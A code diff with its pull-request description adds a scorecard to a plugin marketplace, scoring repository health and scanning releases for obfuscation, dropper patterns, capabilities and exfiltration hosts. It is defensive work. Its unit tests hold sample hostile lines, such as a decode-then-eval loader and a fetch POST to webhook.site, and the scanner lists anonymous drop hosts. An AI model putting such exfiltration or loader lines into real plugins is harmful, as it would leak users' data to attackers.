+  poor: 1,
+  fair: 2,
+  good: 3,
+  excellent: 4,
+});
+
+/** Review verdicts. `pending` means the scan could not run, not that it passed. */
+export const REVIEW_VERDICTS = Object.freeze(["failed", "flagged", "passed", "pending"]);
+
+const DAY = 24 * 60 * 60 * 1000;
+
+/** A finding severity decides the verdict; the labels are what users read. */
+export const SEVERITIES = Object.freeze(["pass", "info", "warn", "fail"]);
+
+function severityRank(severity) {
+  return SEVERITIES.indexOf(severity);
+}
+
+export function finding(severity, check, message) {
+  return { severity, check, message };
+}
+
+// ---------------------------------------------------------------------------
+// Health
+// ---------------------------------------------------------------------------
+
+/**
+ * Score the four health sections from repository signals.
+ *
+ * `signals` carries only values a caller can read from a forge API:
+ *   hasReadme, hasLicense, hasContributing, hasDescription  booleans
+ *   lastCommitAt, lastReleaseAt                             ISO strings or null
+ *   commitsPastYear, contributors                           numbers
+ *   openIssues, closedIssues                                numbers
+ *   installs, stars                                         numbers
+ *
+ * `now` is injected so the tests do not drift with the clock.
+ */
+export function scoreHealth(signals, now = Date.now()) {
+  const sections = [
+    scoreHygiene(signals),
+    scoreMaintenance(signals, now),
+    scoreResponsiveness(signals),
+    scoreAdoption(signals),
+  ];
+
+  // Maintenance is the section that decides whether a plugin is a risk to
+  // install, so it caps the overall grade: a beautifully documented plugin
+  // last touched three years ago is not "excellent".
+  const maintenance = sections.find((section) => section.id === "maintenance");
+  const mean =
+    sections.reduce((total, section) => total + section.points, 0) / sections.length;
+  const grade = capGrade(gradeFromPoints(mean), maintenance.grade);
+
+  return {
+    grade,
+    bars: GRADE_BARS[grade],
+    summary: healthSummary(grade, maintenance),
+    sections,
+  };
+}
+
+function scoreHygiene({ hasReadme, hasLicense, hasContributing, hasDescription }) {
+  const present = [];
+  const missing = [];
+  for (const [label, value] of [
+    ["readme", hasReadme],
+    ["license", hasLicense],
+    ["contributing guide", hasContributing],
+    ["description", hasDescription],
+  ]) {
+    (value ? present : missing).push(label);
+  }
+  // A readme and a license are the two a user actually depends on; the other
+  // two are nice to have, so they cannot on their own drag the section down.
+  const weighted =
+    (hasReadme ? 2 : 0) +
+    (hasLicense ? 2 : 0) +
+    (hasContributing ? 1 : 0) +
+    (hasDescription ? 1 : 0);
+  return {
+    id: "hygiene",
+    label: "Hygiene",
+    points: weighted / 6,
+    grade: gradeFromPoints(weighted / 6),
+    detail:
+      missing.length === 0
+        ? "Readme, license, contributing guide, and description all present."
+        : `Present: ${present.join(", ") || "nothing"}. Missing: ${missing.join(", ")}.`,
+  };
+}
+
+function scoreMaintenance({ lastCommitAt, lastReleaseAt, commitsPastYear }, now) {
+  const commitAge = ageInDays(lastCommitAt, now);
+  const releaseAge = ageInDays(lastReleaseAt, now);
+  const recency = commitAge === null ? 0 : decay(commitAge, 30, 540);
+  const releaseRecency = releaseAge === null ? 0 : decay(releaseAge, 60, 730);
+  const volume = clamp((commitsPastYear ?? 0) / 24, 0, 1);
+  const points = recency * 0.5 + releaseRecency * 0.3 + volume * 0.2;
+  return {
+    id: "maintenance",
+    label: "Maintenance",
+    points,
+    grade: gradeFromPoints(points),
+    detail: [
+      commitAge === null ? "No commit date available." : `Last commit ${describeAge(commitAge)}.`,
+      `${commitsPastYear ?? 0} ${commitsPastYear === 1 ? "commit" : "commits"} in the past year.`,
+      releaseAge === null ? "No release found." : `Last release ${describeAge(releaseAge)}.`,
+    ].join(" "),
+  };
+}
+
+function scoreResponsiveness({ openIssues, closedIssues, contributors }) {
+  const total = (openIssues ?? 0) + (closedIssues ?? 0);
+  // With almost no issue history there is nothing to be responsive to, so the
+  // ratio is neutral rather than a zero that would punish a young plugin.
+  const ratio = total < 5 ? 0.6 : (closedIssues ?? 0) / total;
+  const bus = clamp((contributors ?? 0) / 3, 0, 1);
+  const points = ratio * 0.7 + bus * 0.3;
+  return {
+    id: "responsiveness",
+    label: "Responsiveness",
+    points,
+    grade: gradeFromPoints(points),
+    detail:
+      total === 0
+        ? `No issues yet. ${contributors ?? 0} contributors.`
+        : `Closed ${Math.round(ratio * 100)}% of ${total} issues. ` +
+          `${contributors ?? 0} ${contributors === 1 ? "contributor" : "contributors"}.`,
+  };
+}
+
+function scoreAdoption({ installs, stars }) {
+  // Log scale: the gap between 10 and 100 installs says far more about a
+  // plugin than the gap between 10k and 100k.
+  const installPoints = clamp(Math.log10((installs ?? 0) + 1) / 3, 0, 1);
+  const starPoints = clamp(Math.log10((stars ?? 0) + 1) / 3, 0, 1);
+  const points = installPoints * 0.7 + starPoints * 0.3;
+  return {
+    id: "adoption",
+    label: "Adoption",
+    points,
+    grade: gradeFromPoints(points),
+    detail: `${formatCount(installs ?? 0)} installations, ${formatCount(stars ?? 0)} stars.`,
+  };
+}
+
+function healthSummary(grade, maintenance) {
+  if (grade === "excellent" || grade === "good") return "This plugin is actively maintained.";
+  if (maintenance.grade === "failing") return "This plugin looks dormant.";
+  if (grade === "fair") return "This plugin is maintained irregularly.";
+  return "This plugin shows little recent activity.";
+}
+
+// ---------------------------------------------------------------------------
+// Review scans
+// ---------------------------------------------------------------------------
+
+/**
+ * Capability probes. Each maps a call surface in the release sources to a
+ * label a user can reason about before installing. BB has no declared plugin
+ * permission manifest yet, so these are derived, not verified: they say what
+ * the code can reach, not what a manifest promised.
+ */
+export const CAPABILITY_PROBES = Object.freeze([
+  {
+    id: "shell",
+    label: "Shell Execution",
+    severity: "warn",
+    description:
+      "Runs commands on the host (`child_process`, `execFile`, `spawn`). A plugin with this can do anything the user can.",
+    patterns: [/\bnode:child_process\b/, /from\s+["']child_process["']/, /\b(?:execFile|execFileSync|spawnSync)\s*\(/],
+  },
+  {
+    id: "filesystem",
+    label: "Filesystem Access",
+    severity: "info",
+    description: "Reads or writes files through `node:fs` beyond the plugin's own data directory.",
+    patterns: [/\bnode:fs\b/, /from\s+["']fs(?:\/promises)?["']/],
+  },
+  {
+    id: "network",
+    label: "Network Access",
+    severity: "info",
+    description: "Makes outbound requests (`fetch`, `http`, `WebSocket`).",
+    patterns: [/\bfetch\s*\(/, /\bnode:https?\b/, /\bnew\s+WebSocket\s*\(/, /\bnode:net\b/],
+  },
+  {
+    id: "secrets",
+    label: "Secrets Access",
+    severity: "warn",
+    description: "Reads stored plugin secrets or process environment variables.",
+    patterns: [/\.secrets\b/, /\bsecretRef\b/, /\bprocess\.env\b/],
+  },
+  {
+    id: "http-routes",
+    label: "HTTP Routes",
+    severity: "info",
+    description: "Registers HTTP routes on the BB daemon that other software on the machine can call.",
+    patterns: [/registerRoute\s*\(/, /\broutes\s*:\s*\[/, /addRoute\s*\(/],
+  },
+  {
+    id: "host-daemon",
+    label: "Host Daemon",
+    severity: "warn",
+    description:
+      "Ships a `bb.host` bundle, so part of the plugin runs as its own process on the user's machine rather than inside BB.",
+    patterns: [],
+  },
+  {
+    id: "thread-content",
+    label: "Thread Content",
+    severity: "info",
+    description: "Reads thread messages, agent output, or file diffs.",
+    patterns: [/\bthreads?\.(?:get|list|events|messages)\b/, /\bonThreadEvent\b/, /\bsubscribeThread\b/],
+  },
+  {
+    id: "terminal",
+    label: "Terminal Control",
+    severity: "warn",
+    description: "Opens or writes to terminal sessions on the machine.",
+    patterns: [/\bterminals?\.(?:create|write|send)\b/, /\bnode-pty\b/],
+  },
+  {
+    id: "clipboard",
+    label: "Clipboard Access",
+    severity: "info",
+    description: "Reads or writes the system clipboard.",
+    patterns: [/\bnavigator\.clipboard\b/, /\bclipboard\.(?:read|write)/],
+  },
+]);
+
+/** Hosts that exist to receive data anonymously. A plugin has no honest use for one. */
+const EXFIL_HOSTS = Object.freeze([
+  "pastebin.com",
+  "paste.ee",
+  "hastebin.com",
+  "transfer.sh",
+  "requestbin.com",
+  "pipedream.net",
+  "webhook.site",
+  "ngrok.io",
+  "trycloudflare.com",
+  "discord.com/api/webhooks",
+  "telegram.org",
+  "api.telegram.org",
+]);
+
+const URL_PATTERN = /\bhttps?:\/\/([A-Za-z0-9._-]+(?::\d+)?)(\/[^\s"'`)]*)?/g;
+const IP_HOST_PATTERN = /^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$/;
+const OBFUSCATED_NAME_PATTERN = /_0x[0-9a-f]{4,}/;
+const LONG_LITERAL_PATTERN = /["'`][A-Za-z0-9+/=]{1200,}["'`]/;
+const DYNAMIC_EVAL_PATTERN = /\b(?:eval|new\s+Function)\s*\(\s*(?!["'`])/;
+/**
+ * Decoding a payload is ordinary; evaluating one is ordinary in a REPL. A
+ * file that does both is the shape a dropper takes, so the pair is the
+ * signal, not either half.
+ */
+const DECODE_PATTERN = /\b(?:atob|fromCharCode)\s*\(|Buffer\.from\s*\([^)]*["']base64["']/;
+
+/**
+ * Scan the extracted release sources.
+ *
+ * `files` is an array of `{ path, text }`. The caller decides what counts as a
+ * source file; this function assumes the list already excludes build output,
+ * dependencies, and binary content.
+ *
+ * `manifest` is the plugin's package.json, used for the declared `bb` surface.
+ */
+export function scanRelease(files, manifest = {}) {
+  const findings = [];
+  const capabilities = [];
+  const hosts = new Set();
+
+  const hits = new Map(CAPABILITY_PROBES.map((probe) => [probe.id, []]));
+  const obfuscation = [];
+  const generated = [];
+
+  for (const { path, text } of files) {
+    // Data files legitimately hold long lines and encoded blobs; running the
+    // obfuscation heuristics over them only produces false positives.
+    const isData = path.endsWith(".json");
+    if (!isData) {
+      if (OBFUSCATED_NAME_PATTERN.test(text)) {
+        obfuscation.push(`${path}: hexadecimal identifier names typical of a code obfuscator.`);
+      }
+      if (DECODE_PATTERN.test(text) && DYNAMIC_EVAL_PATTERN.test(text)) {
+        obfuscation.push(`${path}: decodes a payload and evaluates a non-literal value.`);
+      }
+
+      // A long line or a dynamic eval is what a bundler produces as often as
+      // an obfuscator, so it is reported and not treated as a verdict.
+      if (DYNAMIC_EVAL_PATTERN.test(text)) {
+        generated.push(`${path}: evaluates a value that is not a literal.`);
+      }
+      if (LONG_LITERAL_PATTERN.test(text)) {
+        // Real code carries long literals too — an inlined SVG, a prompt, a
+        // data URL — so this is worth showing and not worth failing over.
+        generated.push(`${path}: an encoded string literal longer than 1200 characters.`);
+      }
+      if (longestLineLength(text) > 5000) {
+        generated.push(`${path}: a source line longer than 5000 characters.`);
+      }
+    }
+
+    for (const probe of CAPABILITY_PROBES) {
+      if (probe.patterns.some((pattern) => pattern.test(text))) hits.get(probe.id).push(path);
+    }
+
+    for (const match of text.matchAll(URL_PATTERN)) {
+      hosts.add(`${match[1]}${match[2]?.startsWith("/api/webhooks") ? match[2] : ""}`);
+    }
+  }
+
+  // A declared bb.host bundle is a manifest fact, not a code pattern.
+  if (manifest?.bb?.host !== undefined) hits.get("host-daemon").push("package.json");
+
+  for (const probe of CAPABILITY_PROBES) {
+    const paths = hits.get(probe.id);
+    if (paths.length === 0) continue;
+    capabilities.push({
+      id: probe.id,
+      label: probe.label,
+      severity: probe.severity,
+      description: probe.description,
+      evidence: paths.slice(0, 5),
+    });
+  }
+
+  findings.push(
+    obfuscation.length === 0
+      ? finding("pass", "obfuscation", "No obfuscated code detected.")
+      : finding(
+          "fail",
+          "obfuscation",
+          `Obfuscated code in the published sources. ${obfuscation.slice(0, 3).join(" ")}`,
+        ),
+  );
+  if (generated.length > 0) {
+    findings.push(
+      finding(
+        "warn",
+        "generated",
+        `Minified or generated code committed to the sources, which no one can review. ${generated.slice(0, 3).join(" ")}`,
+      ),
+    );
+  }
+
+  const suspicious = [...hosts].filter((host) =>
+    EXFIL_HOSTS.some((bad) => host === bad || host.startsWith(`${bad}/`) || host.endsWith(`.${bad}`)),
+  );
+  const rawIps = [...hosts].filter((host) => IP_HOST_PATTERN.test(host) && !host.startsWith("127."));
+  if (suspicious.length > 0) {
+    findings.push(
+      finding("fail", "network", `Contacts an anonymous drop host: ${suspicious.join(", ")}.`),
+    );
+  } else if (rawIps.length > 0) {
+    findings.push(
+      finding("warn", "network", `Contacts a hardcoded IP address: ${rawIps.join(", ")}.`),
+    );
+  } else {
+    findings.push(finding("pass", "network", "No suspicious network patterns found."));
+  }
+
+  return { findings, capabilities, hosts: [...hosts].sort() };
+}
+
+/** OSV answers per queried package; turn them into one dependency finding. */
+export function dependencyFinding(vulnerabilities) {
+  if (vulnerabilities === null || vulnerabilities === undefined) {
+    return finding("info", "dependencies", "Dependency scan not available: the release ships no lockfile.");
+  }
+  if (vulnerabilities.length === 0) {
+    return finding("pass", "dependencies", "No vulnerable dependencies found.");
+  }
+  const named = vulnerabilities
+    .slice(0, 3)
+    .map((item) => `${item.package}@${item.version} (${item.id})`)
+    .join(", ");
+  const severity = vulnerabilities.some((item) => item.critical) ? "fail" : "warn";
+  return finding(
+    severity,
+    "dependencies",
+    `${vulnerabilities.length} vulnerable ${vulnerabilities.length === 1 ? "dependency" : "dependencies"}: ${named}.`,
+  );
+}
+
+export function licenseFinding(license) {
+  if (!license) return finding("warn", "license", "No license found. The plugin has no stated terms of use.");
+  if (/^(?:GPL|AGPL|LGPL)/i.test(license)) {
+    return finding("info", "license", `License \`${license}\` is a copyleft license.`);
+  }
+  return finding("pass", "license", `License \`${license}\`.`);
+}
+
+export function provenanceFinding(source, attested) {
+  if (source?.npm !== undefined) {
+    return attested
+      ? finding("pass", "provenance", "The published npm package carries a verified provenance attestation.")
+      : finding("info", "provenance", "The npm package has no provenance attestation.");
+  }
+  return finding(
+    "info",
+    "provenance",
+    "Provenance not available: the release is a Git tag, so nothing links the tag to a build.",
+  );
+}
+
+/** Every review finding rolls into one verdict, worst severity wins. */
+export function scoreReview(findings) {
+  if (findings.length === 0) {
+    return { verdict: "pending", bars: 0, summary: "The release has not been scanned yet.", findings };
+  }
+  const worst = findings.reduce(
+    (rank, item) => Math.max(rank, severityRank(item.severity)),
+    0,
+  );
+  const counted = findings.filter((item) => item.severity !== "pass").length;
+  const verdict = worst === severityRank("fail") ? "failed" : worst === severityRank("warn") ? "flagged" : "passed";
+  return {
+    verdict,
+    bars: verdict === "failed" ? 1 : verdict === "flagged" ? 3 : 4,
+    summary:
+      counted === 0
+        ? "No issues found by automated scans of the latest release."
+        : `${counted} ${counted === 1 ? "issue" : "issues"} found by automated scans of the latest release.`,
+    findings: [...findings].sort((a, b) => severityRank(b.severity) - severityRank(a.severity)),
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Document
+// ---------------------------------------------------------------------------
+
+/**
+ * Compose the published sidecar. Like stats.json this is a separate document:
+ * the v1 and v2 marketplace schemas are strict, scores move on their own
+ * cadence, and a rescan must not rewrite the catalog every night.
+ */
+export function scorecardDocument(scorecards, generatedAt = new Date().toISOString()) {
+  const plugins = {};
+  for (const id of Object.keys(scorecards).sort()) plugins[id] = scorecards[id];
+  return { schemaVersion: 1, generatedAt, plugins };
+}
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+function gradeFromPoints(points) {
+  if (points >= 0.85) return "excellent";
+  if (points >= 0.65) return "good";
+  if (points >= 0.45) return "fair";
+  if (points >= 0.25) return "poor";
+  return "failing";
+}
+
+function capGrade(grade, cap) {
+  return GRADES.indexOf(grade) <= GRADES.indexOf(cap) ? grade : cap;
+}
+
+function clamp(value, low, high) {
+  return Math.min(high, Math.max(low, value));
+}
+
+/** 1 until `fresh` days old, then straight down to 0 at `stale` days. */
+function decay(days, fresh, stale) {
+  if (days <= fresh) return 1;
+  if (days >= stale) return 0;
+  return 1 - (days - fresh) / (stale - fresh);
+}
+
+function ageInDays(iso, now) {
+  if (!iso) return null;
+  const time = Date.parse(iso);
+  if (Number.isNaN(time)) return null;
+  return Math.max(0, (now - time) / DAY);
+}
+
+function describeAge(days) {
+  const whole = Math.round(days);
+  if (whole <= 1) return "today";
+  if (whole < 45) return `${whole} days ago`;
+  if (whole < 365) return `${Math.round(whole / 30)} months ago`;
+  const years = whole / 365;
+  return `${years < 2 ? "over a year" : `${Math.round(years)} years`} ago`;
+}
+
+function longestLineLength(text) {
+  let longest = 0;
+  let start = 0;
+  for (let index = 0; index <= text.length; index += 1) {
+    if (index === text.length || text[index] === "\n") {
+      longest = Math.max(longest, index - start);
+      start = index + 1;
+    }
+  }
+  return longest;
+}
+
+function formatCount(value) {
+  if (value >= 1000) return `${(value / 1000).toFixed(1).replace(/\.0$/, "")}k`;
+  return `${value}`;
+}

--- a/test/scorecard.test.mjs
+++ b/test/scorecard.test.mjs
@@ -1,0 +1,241 @@
+import assert from "node:assert/strict";
+import { test } from "node:test";
+import {
+  dependencyFinding,
+  licenseFinding,
+  provenanceFinding,
+  scanRelease,
+  scoreHealth,
+  scoreReview,
+  scorecardDocument,
+} from "../scripts/scorecard-lib.mjs";
+
+const NOW = Date.parse("2026-06-01T00:00:00.000Z");
+const daysAgo = (days) => new Date(NOW - days * 24 * 60 * 60 * 1000).toISOString();
+
+const healthySignals = {
+  hasReadme: true,
+  hasLicense: true,
+  hasContributing: true,
+  hasDescription: true,
+  lastCommitAt: daysAgo(2),
+  lastReleaseAt: daysAgo(3),
+  commitsPastYear: 400,
+  contributors: 3,
+  openIssues: 4,
+  closedIssues: 200,
+  installs: 30_500,
+  stars: 2700,
+};
+
+test("a busy, documented, widely installed plugin scores excellent", () => {
+  const health = scoreHealth(healthySignals, NOW);
+  assert.equal(health.grade, "excellent");
+  assert.equal(health.bars, 4);
+  assert.equal(health.summary, "This plugin is actively maintained.");
+  assert.deepEqual(
+    health.sections.map((section) => section.id),
+    ["hygiene", "maintenance", "responsiveness", "adoption"],
+  );
+});
+
+test("maintenance caps the overall grade", () => {
+  // Everything else is perfect; the repository has not been touched in years.
+  const health = scoreHealth(
+    { ...healthySignals, lastCommitAt: daysAgo(900), lastReleaseAt: daysAgo(900), commitsPastYear: 0 },
+    NOW,
+  );
+  assert.equal(health.grade, "failing");
+  assert.equal(health.summary, "This plugin looks dormant.");
+});
+
+test("a young plugin with no issue history is not punished for it", () => {
+  const quiet = scoreHealth(
+    { ...healthySignals, openIssues: 0, closedIssues: 0, installs: 40, stars: 5 },
+    NOW,
+  );
+  const responsiveness = quiet.sections.find((section) => section.id === "responsiveness");
+  assert.ok(responsiveness.points >= 0.5, `expected a neutral score, got ${responsiveness.points}`);
+  assert.match(responsiveness.detail, /No issues yet/);
+});
+
+test("hygiene names what is missing", () => {
+  const health = scoreHealth({ ...healthySignals, hasLicense: false, hasContributing: false }, NOW);
+  const hygiene = health.sections.find((section) => section.id === "hygiene");
+  assert.match(hygiene.detail, /Missing: license, contributing guide\./);
+});
+
+test("counts read as English at one", () => {
+  const health = scoreHealth({ ...healthySignals, commitsPastYear: 1, contributors: 1 }, NOW);
+  const maintenance = health.sections.find((section) => section.id === "maintenance");
+  const responsiveness = health.sections.find((section) => section.id === "responsiveness");
+  assert.match(maintenance.detail, /1 commit in the past year/);
+  assert.match(responsiveness.detail, /1 contributor\./);
+});
+
+test("a clean release passes and discloses nothing alarming", () => {
+  const scan = scanRelease(
+    [{ path: "server.ts", text: "export const start = () => console.log('hello');\n" }],
+    { name: "clean-plugin" },
+  );
+  assert.equal(scan.findings.find((item) => item.check === "obfuscation").severity, "pass");
+  assert.equal(scan.findings.find((item) => item.check === "network").severity, "pass");
+  assert.deepEqual(scan.capabilities, []);
+});
+
+test("obfuscated code fails the review", () => {
+  const scan = scanRelease([
+    { path: "main.js", text: "const _0xdeadbeef = ['a'];\nfunction _0x1234(){}\n" },
+  ]);
+  const obfuscation = scan.findings.find((item) => item.check === "obfuscation");
+  assert.equal(obfuscation.severity, "fail");
+  assert.equal(scoreReview(scan.findings).verdict, "failed");
+});
+
+test("decoding a payload and evaluating it fails the review", () => {
+  const scan = scanRelease([
+    { path: "loader.js", text: "const payload = atob(remote); eval(payload);\n" },
+  ]);
+  assert.equal(scan.findings.find((item) => item.check === "obfuscation").severity, "fail");
+});
+
+test("an anonymous drop host fails, a hardcoded IP only warns", () => {
+  const exfil = scanRelease([
+    { path: "send.ts", text: "await fetch('https://webhook.site/abc', { method: 'POST' });\n" },
+  ]);
+  assert.equal(exfil.findings.find((item) => item.check === "network").severity, "fail");
+
+  const rawIp = scanRelease([
+    { path: "send.ts", text: "await fetch('http://203.0.113.9:8080/collect');\n" },
+  ]);
+  assert.equal(rawIp.findings.find((item) => item.check === "network").severity, "warn");
+});
+
+test("localhost is not treated as a hardcoded remote address", () => {
+  const scan = scanRelease([
+    { path: "client.ts", text: "await fetch('http://127.0.0.1:31337/health');\n" },
+  ]);
+  assert.equal(scan.findings.find((item) => item.check === "network").severity, "pass");
+});
+
+test("capabilities are derived from the call surface, with evidence", () => {
+  const scan = scanRelease(
+    [
+      { path: "server.ts", text: "import { execFile } from 'node:child_process';\nprocess.env.TOKEN;\n" },
+      { path: "app.tsx", text: "await fetch(url);\n" },
+    ],
+    { bb: { host: "dist/host.js" } },
+  );
+  const ids = scan.capabilities.map((capability) => capability.id).sort();
+  assert.deepEqual(ids, ["host-daemon", "network", "secrets", "shell"]);
+  const shell = scan.capabilities.find((capability) => capability.id === "shell");
+  assert.equal(shell.severity, "warn");
+  assert.deepEqual(shell.evidence, ["server.ts"]);
+  const host = scan.capabilities.find((capability) => capability.id === "host-daemon");
+  assert.deepEqual(host.evidence, ["package.json"]);
+});
+
+test("a missing lockfile is reported as an absent scan, not a pass", () => {
+  const item = dependencyFinding(null);
+  assert.equal(item.severity, "info");
+  assert.match(item.message, /not available/);
+});
+
+test("a critical vulnerability fails, a lesser one flags", () => {
+  const critical = dependencyFinding([
+    { package: "left-pad", version: "1.0.0", id: "GHSA-xxxx", critical: true },
+  ]);
+  assert.equal(critical.severity, "fail");
+  const moderate = dependencyFinding([
+    { package: "left-pad", version: "1.0.0", id: "GHSA-xxxx", critical: false },
+  ]);
+  assert.equal(moderate.severity, "warn");
+  assert.match(moderate.message, /left-pad@1\.0\.0 \(GHSA-xxxx\)/);
+});
+
+test("licenses are classified, and a missing one warns", () => {
+  assert.equal(licenseFinding("MIT").severity, "pass");
+  assert.equal(licenseFinding("GPL-3.0").severity, "info");
+  assert.equal(licenseFinding(null).severity, "warn");
+});
+
+test("provenance depends on the source kind", () => {
+  assert.equal(provenanceFinding({ npm: { package: "x" } }, true).severity, "pass");
+  assert.equal(provenanceFinding({ npm: { package: "x" } }, false).severity, "info");
+  assert.match(provenanceFinding({ git: { url: "x" } }, false).message, /Git tag/);
+});
+
+test("the verdict takes the worst severity and counts the rest", () => {
+  const passed = scoreReview([
+    { severity: "pass", check: "a", message: "" },
+    { severity: "info", check: "b", message: "" },
+  ]);
+  assert.equal(passed.verdict, "passed");
+  assert.equal(passed.summary, "1 issue found by automated scans of the latest release.");
+  assert.equal(passed.findings[0].severity, "info", "worst finding sorts first");
+
+  assert.equal(scoreReview([{ severity: "warn", check: "a", message: "" }]).verdict, "flagged");
+  assert.equal(scoreReview([{ severity: "fail", check: "a", message: "" }]).verdict, "failed");
+});
+
+test("an unscanned release is pending, never passed", () => {
+  const review = scoreReview([]);
+  assert.equal(review.verdict, "pending");
+  assert.equal(review.bars, 0);
+});
+
+test("the document sorts plugins and stamps the given time", () => {
+  const document = scorecardDocument({ zulu: { a: 1 }, alpha: { a: 2 } }, "2026-06-01T00:00:00.000Z");
+  assert.deepEqual(Object.keys(document.plugins), ["alpha", "zulu"]);
+  assert.equal(document.schemaVersion, 1);
+  assert.equal(document.generatedAt, "2026-06-01T00:00:00.000Z");
+});
+
+test("the composed document validates against the published schema", async () => {
+  const { default: Ajv } = await import("ajv/dist/2020.js");
+  const { default: addFormats } = await import("ajv-formats");
+  const { readFileSync } = await import("node:fs");
+  const schema = JSON.parse(readFileSync(new URL("../schema/scorecards.schema.json", import.meta.url), "utf8"));
+  const ajv = new Ajv({ allErrors: true, strict: false });
+  addFormats(ajv);
+  const validate = ajv.compile(schema);
+
+  const scan = scanRelease([{ path: "server.ts", text: "import 'node:fs';\nawait fetch(url);\n" }], {
+    license: "MIT",
+  });
+  const document = scorecardDocument({
+    "example-plugin": {
+      repository: "example/bb-plugin-example",
+      license: "MIT",
+      health: scoreHealth(healthySignals, NOW),
+      review: {
+        ...scoreReview([...scan.findings, dependencyFinding([]), licenseFinding("MIT"), provenanceFinding({ git: {} }, false)]),
+        release: "v1.2.3",
+        scannedFiles: 1,
+        capabilities: scan.capabilities,
+      },
+    },
+    "npm-only-plugin": {
+      health: null,
+      review: { ...scoreReview([]), error: "npm package has no tarball" },
+    },
+  });
+
+  assert.ok(validate(document), JSON.stringify(validate.errors, null, 2));
+});
+
+test("minified sources are reported without failing the review", () => {
+  const scan = scanRelease([{ path: "lib/marks.ts", text: `const table = "${"x".repeat(6000)}";\n` }]);
+  assert.equal(scan.findings.find((item) => item.check === "obfuscation").severity, "pass");
+  const generated = scan.findings.find((item) => item.check === "generated");
+  assert.equal(generated.severity, "warn");
+  assert.equal(scoreReview(scan.findings).verdict, "flagged");
+});
+
+test("data files are exempt from the code heuristics", () => {
+  const scan = scanRelease([
+    { path: "data/icons.json", text: `{"blob":"${"A".repeat(4000)}"}\n` },
+  ]);
+  assert.equal(scan.findings.find((item) => item.check === "obfuscation").severity, "pass");
+  assert.equal(scan.findings.find((item) => item.check === "generated"), undefined);
+});


### PR DESCRIPTION
Today CI validates an entry and its remote source, and a maintainer reads the plugin. Nothing scans the code, and nothing rescans it after the first submission. An entry tracking a semver range picks up new tags without a pull request, so a compromised update currently reaches users unexamined.

This adds a scorecard sidecar published beside `marketplace.json`, for the same reasons `stats.json` is a sidecar: the manifest schemas are strict, and these scores move on their own cadence.

## What it produces

`dist/v2/scorecards.json`, two scores per plugin:

- **health** — hygiene, maintenance, responsiveness, adoption, read from the GitHub API. Maintenance caps the overall grade, so a well-documented but dormant plugin cannot grade well.
- **review** — automated scans of the release the entry actually resolves to: obfuscated code, committed minified code, network patterns, vulnerable production dependencies, license, provenance, plus the capabilities the code reaches for (shell execution, filesystem, secrets, host daemon, terminal, clipboard, thread content).

Only two signals fail a review: obfuscator-generated identifiers, and a file that both decodes a payload and evaluates a non-literal value. A failing verdict blocks a merge, and a false positive there costs an author their submission, so every weaker signal flags instead of failing.

## Wiring

- `.github/workflows/scorecard.yml` — a pull request scans only the entries it changes, fails on a review failure, and writes a findings table to the job summary. A weekly run scans every entry and uploads the document to R2, matching the existing `stats.yml` shape.
- `npm run scorecards -- --entry <id> --print` runs one entry locally. Needs `GITHUB_TOKEN` with public repository read access; no other credential, and no new dependency.

## Verification

- 21 unit tests over the scoring rules and every scan heuristic (`test/scorecard.test.mjs`), plus a test that the composed document validates against `schema/scorecards.schema.json`.
- A live 15-entry run scored all 15 with no failures and no warnings.
- The `--changed` path was exercised against a real two-commit range and selected exactly the changed entries.
- Four defects the live runs surfaced are fixed here: monorepo `subdir` entries were scanned whole (one plugin was failing on a sibling's minified line), search-API rate limits dropped plugins, long minified lines were graded as hard obfuscation, and dev-only dependencies were counted — replaced by a production-closure walk of the lockfile.

## Known gaps, deliberately

- **No reproducible-build check.** Verifying that a release artifact comes from its sources needs a clean container running `bb plugin build`. That is the strongest single signal available and the natural follow-up.
- **Capabilities are observed, not declared.** BB has no plugin permission manifest, so this reports what the code can reach, not what an author promised. Once the SDK carries declared permissions, this scan becomes a diff against the declaration rather than a disclosure.
- Health is unavailable for an entry whose npm manifest names no repository; it degrades to `null` rather than being guessed.

Happy to split this, change the cadence, or drop the sidecar into the v2 document instead if you would rather it live there.
